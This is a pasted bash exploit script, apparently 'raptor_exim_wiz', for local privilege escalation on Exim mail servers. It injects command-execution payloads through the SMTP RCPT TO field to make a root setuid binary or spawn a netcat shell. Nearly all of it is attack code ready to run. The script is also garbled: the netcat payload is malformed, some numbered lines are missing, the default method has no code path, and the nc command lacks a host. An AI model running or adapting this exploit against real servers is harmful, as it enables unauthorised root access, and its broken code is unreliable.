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Jun 20th, 2019
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  1. #!/bin/bash
  2. METHOD="setuid" # default method
  3. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  4. PAYLOAD_NETCAT='${run{\x2whoami\x22}}@localhost'
  5. # usage instructions
  6. function usage()
  7. {
  8. echo "$0 [-m METHOD]"
  9. echo "-m setuid : use the setuid payload (default)"
  10. echo "-m netcat : use the netcat payload"
  11. exit 1
  12. }
  13. # payload delivery
  14. function exploit()
  15. {
  16. # connect to localhost:25
  17. exec 3<>/dev/tcp/localhost/25
  18. # deliver the payload
  19. read -u 3 && echo $REPLY
  20. echo "helo localhost" >&3
  21. read -u 3 && echo $REPLY
  22. echo "mail from:<>" >&3
  23. read -u 3 && echo $REPLY
  24. echo "rcpt to:<$PAYLOAD>" >&3
  25. read -u 3 && echo $REPLY
  26. echo "data" >&3
  27. read -u 3 && echo $REPLY
  28. for i in {1..31}
  29. do
  30. echo "Received: $i" >&3
  31. done
  32. echo "." >&3
  33. read -u 3 && echo $REPLY
  34. echo "quit" >&3
  35. read -u 3 && echo $REPLY
  36. }
  37. # print banner
  38. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
  39. echo 'Copyright (c) 2019 Marco Ivaldi <>'
  40. # parse command line
  41. while [ ! -z "$1" ]; do
  42. case $1 in
  43. -m) shift; METHOD="$1"; shift;;
  44. * ) usage
  45. ;;
  46. esac
  47. done
  48. if [ -z $METHOD ]; then
  49. usage
  50. fi
  52. if [ $METHOD = "netcat" ]; then
  53. # select and deliver the payload
  54. echo "Delivering $METHOD payload..."
  56. exploit
  57. # wait for the magic to happen and spawn our shell
  58. echo "Waiting 5 seconds..."
  59. sleep 5
  60. nc -v 31337
  61. # print help
  62. else
  63. usage
  64. fi
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